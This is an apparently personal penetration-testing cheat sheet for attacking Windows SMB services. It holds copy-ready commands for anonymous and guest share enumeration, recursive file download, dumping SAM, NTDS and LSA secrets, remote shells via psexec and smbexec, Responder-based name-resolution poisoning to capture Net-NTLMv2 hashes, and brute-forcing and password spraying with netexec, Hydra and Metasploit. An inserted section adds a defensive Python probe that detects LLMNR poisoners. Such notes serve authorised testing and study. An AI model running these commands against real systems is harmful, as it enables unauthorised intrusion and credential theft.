PRIMARY CATEGORY → PROTOCOLS AND SERVICES
REFERENCES
  • Guest vs Null Session on Windows: see here

SMB → Server Message Block

Ports
SMB Over NetBIOS

These UDP/TCP ports use NetBIOS as an intermediate layer between the transport layer and the application layer

SMB version → v1.1 or lower

  • 137 → NBNS (NetBIOS Name Service) → UDP

Resolution of NetBIOS host names to IP addresses

  • 138 → Datagram transmission → UDP

Connectionless datagram transmission service

  • 139 → Connection-oriented SMB sessions → TCP
SMB Over TCP

SMB version → 2.x - 3.x and later

  • 445 → SMB directly over TCP (no NetBIOS layer)

Enumeration

Netexec

nxc smb <TARGET>
Null/Anonymous Authentication
Netexec
nxc smb <TARGET> --username '' --password '' # Long Format
nxc smb <TARGET> -u '' -p '' # Short Format
SMBMap
  • Local User
smbmap -u '' -p '' -H <TARGET>
  • Domain User
smbmap -u '' -p '' -d '<DOMAIN>' <TARGET>
Guest Authentication
Netexec
nxc smb <TARGET> --username 'guest' --password '' # Or -u 'anyrandomuser'
Shared Resources Enumeration
Null Auth
  • Netexec
nxc smb <TARGET> --username '' --password '' --shares
  • SMBMap
smbmap -u '' -H <TARGET>
  • SMBClient
smbclient --user '' --no-pass --list <TARGET>
smbclient -U '' -N -L //<TARGET>
  • SMBClient.py (Impacket)
smbclient.py -no-pass '<DOMAIN/WORKGROUP>@<TARGET>'
Guest Auth
  • Netexec
nxc smb <TARGET> --username 'guest' --password '' --shares
  • SMBMap
smbmap -u 'guest' -p '' -H <TARGET>
  • SMBClient
smbclient --user 'guest%' --list active.htb
  • SMBClient.py (Impacket)
smbclient.py -no-pass '<DOMAIN/WORKGROUP>/guest@<TARGET>'
User Account Authentication
  • Netexec
nxc smb <TARGET> --username '<USER>' --password '<PASSWORD>' --shares
  • SMBMap
smbmap -u '<USER>' -p '<PASSWORD>' -H <TARGET>
  • SMBClient
smbclient --user '<USER>%<PASSWORD>' '//<TARGET>/<RESOURCE>'
smbclient --user '<DOMAIN/WORKGROUP>\<USER>%<PASSWORD>' '//<TARGET>/<RESOURCE>'
  • SMBClient.py (Impacket)
smbclient.py '<DOMAIN/WORKGROUP>/<USER>:<PASSWORD>@<TARGET>' # Password goes in the target string; -no-pass is for null sessions only
Recursive Enumeration
  • Netexec
nxc smb <TARGET> --username '' --password '' --module spider_plus # All Files
nxc smb <TARGET> -u '' -p '' -M spider_plus # Short Format
nxc smb <TARGET> --username '' --password '' --module spider_plus --share <RESOURCE_PATH> # Specific Shared Directory
  • SMBMap
smbmap -H <TARGET> -u '' -p '' -R # All Shared Resources
smbmap -H <TARGET> -u '' -p '' -R --depth <INTEGER> # All Shared Resources limited to X depth
smbmap -H <TARGET> -u '' -p '' -r '<SHARED_RESOURCE>' # A Specific Shared Resource
Recursive Download
  • SMBClient
smbclient --user '' --no-pass //<TARGET>/<RESOURCE_PATH>
> mask ""
> recurse on
> prompt off
> mget *
User Enumeration

Valid domain account credentials are required

Netexec
nxc smb <TARGET> --username '<USERNAME>' --password '<PASSWORD>' --users
Logged-on Users Enumeration
Netexec
nxc smb <TARGET> --username '<USER>' --password '<PASSWD>' --loggedon-users

Mount a Shared SMB Folder

No Auth

Null Session or Guest Authentication

mount --types cifs --options guest //<TARGET>/<SHARED_RESOURCE> <LOCAL_PATH> # 'guest' avoids the password prompt; --options needs an argument
  • Read Only
mount --types cifs --options ro,guest //<TARGET>/<SHARED_RESOURCE> <LOCAL_PATH>
Auth Required
mount --types cifs --options username=<USER>,password=<PASSWORD> //<TARGET>/<SHARED_RESOURCE> <LOCAL_PATH>
  • Read Only
mount --types cifs --options ro,username=<USER>,password=<PASSWORD> //<TARGET>/<SHARED_RESOURCE> <LOCAL_PATH>

Sensitive Data Dump

Privileged Account Credentials are required

Dump SAM Credentials
nxc smb <TARGET> --username '<USERNAME>' --password '<PASSWORD>' --sam
Dump NTDS Credentials
nxc smb <TARGET> --username '<USERNAME>' --password '<PASSWORD>' --ntds
Dump LSA Secrets
nxc smb <TARGET> --username '<USERNAME>' --password '<PASSWORD>' --lsa

Remote Connection

PSExec
PSExec.py (Impacket)
psexec.py '<DOMAIN>/<USERNAME>:<PASSWORD>@<HOSTNAME>'
PSExec64.exe (Sysinternals)
psexec64.exe -i -a <COMMAND> # e.g. cmd.exe or powershell.exe
SMBExec.py (Impacket)
smbexec.py '<DOMAIN>/<USERNAME>:<PASSWORD>@<HOSTNAME>'

Lateral Movement



Authentication Coercion



MitM and Credential Cracking

By default, when a user logs in to a Windows machine, whether it is domain-joined or not, every process run under that user is associated with an access token, which in turn is related to a logon session through a specific attribute

If the user logs in to the system interactively (logon type 2) or via remote interactive logon (logon type 10), their credentials are tied to the generated logon session and cached

The latter does not happen with network authentication

To spare the user from re-entering their credentials each time they request a network resource (which implies an authentication), Windows introduced SSO (Single Sign-On)

Because of this behaviour, if an attacker forces or coerces a Windows machine to connect to an attacker-controlled SMB server that requires authentication, the victim authenticates to the rogue server and that user's credentials are captured

Likewise, a user logged in to a Windows machine could mistype a single character of the hostname when entering a UNC path in File Explorer, thereby specifying a hostname that does not exist

The SMB client would then send a DNS query to its primary DNS server, which on a domain-joined computer is usually the DC, requesting the canonical name and address for that hostname

Since the given hostname does not exist, the DNS server responds that there is no record for the supplied name

At this point, the Windows machine falls back to the following multicast name resolution protocols →

  • mDNS → Multicast Domain Name System
  • LLMNR → Link-Local Multicast Name Resolution
  • NBT-NS → NetBIOS Name Service

As their names suggest, these protocols are multicast, so the client's name resolution query is sent to every host within the multicast range

If an attacker is listening for those queries with an LLMNR, NBT-NS and mDNS poisoning tool such as Responder, which among other things sets up an SMB server, they can reply to the victim claiming that the supplied hostname resolves to the attacker's own address

The SMB client would then negotiate the protocol version and authentication mechanisms with the rogue SMB server, and the victim would authenticate to it

At this point, the attacker receives a Net-NTLMv2 response, from which several actions can be carried out →


Responder

Responder.py --interface <INTERFACE>
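Added defender-side example, not part of the original cheat sheet: a small canary probe that sends the same kind of LLMNR query a Windows client falls back to when DNS cannot resolve a name, then parses whatever answers. The canary host name is assumed to exist nowhere on the segment, so any reply comes from a poisoner such as the Responder setup described above; the 224.0.0.252:5355 group/port are the LLMNR standard, the wire format is DNS's, and the transaction id is just a constructed value.

```python
import socket
import struct

LLMNR_GROUP, LLMNR_PORT = "224.0.0.252", 5355  # standard LLMNR multicast group and port

def encode_name(name):  # DNS label encoding; LLMNR reuses the DNS wire format
    labels = [l.encode("ascii") for l in name.strip(".").split(".")]
    return b"".join(bytes([len(l)]) + l for l in labels) + b"\x00"

def build_query(txid, name):  # A query with no flags, as a client sends after DNS fails
    return struct.pack(">HHHHHH", txid, 0, 1, 0, 0, 0) + encode_name(name) + struct.pack(">HH", 1, 1)

def read_name(data, pos):  # decode a possibly compressed name -> (name, offset after it)
    labels = []
    while data[pos] and data[pos] & 0xC0 != 0xC0:
        labels.append(data[pos + 1:pos + 1 + data[pos]].decode("ascii"))
        pos += 1 + data[pos]
    if data[pos] & 0xC0 == 0xC0:  # compression pointer back to an earlier name
        ptr = struct.unpack(">H", data[pos:pos + 2])[0] & 0x3FFF
        return ".".join(labels + [read_name(data, ptr)[0]]), pos + 2
    return ".".join(labels), pos + 1

def parse_response(data, txid):  # (answered_name, [IPv4 addrs]) for a reply to our txid, else None
    rtxid, flags, qd, an = struct.unpack(">HHHH", data[:8]) if len(data) >= 12 else (None, 0, 0, 0)
    if rtxid != txid or not flags & 0x8000:  # QR bit set means this is a response
        return None
    pos = 12
    for _ in range(qd):
        pos = read_name(data, pos)[1] + 4  # skip QTYPE and QCLASS
    name, addrs = None, []
    for _ in range(an):
        name, pos = read_name(data, pos)
        rtype, _, _, rdlen = struct.unpack(">HHIH", data[pos:pos + 10])
        if rtype == 1 and rdlen == 4:  # A record
            addrs.append(socket.inet_ntoa(data[pos + 10:pos + 14]))
        pos += 10 + rdlen
    return name, addrs

def probe(name="llmnr-canary-does-not-exist", timeout=2.0):  # returns [(source_ip, (name, addrs))]
    txid, hits = 0x1234, []  # constructed transaction id
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    sock.sendto(build_query(txid, name), (LLMNR_GROUP, LLMNR_PORT))
    while True:  # any reply for a name that does not exist comes from a poisoner
        try:
            data, (src, _) = sock.recvfrom(1024)
        except socket.timeout:
            return hits
        if (parsed := parse_response(data, txid)):
            hits.append((src, parsed))
```

Run probe() from a host in the segment; an empty list is the expected result on a clean network, and any entry names the responder's IP and the address it tried to hand out.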

Bruteforcing || Password Spraying

Netexec

Reference

Local Accounts
nxc smb <HOSTNAME> --username <USER OR USERLIST> --password <PASSWD OR PASSWDLIST> --domain . --local-auth
Domain Accounts
nxc smb <HOSTNAME> --username <USER OR USERLIST> --password <PASSWD OR PASSWDLIST> --domain <DOMAIN>
Hydra

Reference • Hydra SMB2 Support

Compile from Source
  • Repository Cloning and Installation of Deps
apt install -y -- libssl-dev libssh-dev libidn11-dev libpcre3-dev libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev firebird-dev libmemcached-dev libgpg-error-dev libgcrypt11-dev libgcrypt20-dev
apt install -y -- libsmbclient-dev # Required for the smb2 module
git clone https://github.com/vanhauser-thc/thc-hydra Hydra
cd Hydra && ./configure # Run configure after the deps are installed so it detects libsmbclient
  • Compilation and Installation of the Binary on the System

Before proceeding with the compilation, check the output of ./configure

make && sudo make install
  • Run Hydra with SMB2 as follows →
Bruteforcing
  • One User ↔ Passwordlist
hydra -v -T <THREADS> -l <USERNAME> -P <PASSWDLIST> <TARGET> smb2
  • Userlist → Passwordlist
hydra -v -T <THREADS> -L <USERLIST> -P <PASSWORDLIST> <TARGET> smb2
Password Spraying
hydra -v -T <THREADS> -L <USERLIST> -p <PASSWORD> <TARGET> smb2
Metasploit
SMB_Login
msfconsole -q
> use auxiliary/scanner/smb/smb_login
> set user_file <USERLIST>
> set pass_file <PASSWDLIST>
> set rhosts <TARGET>
> run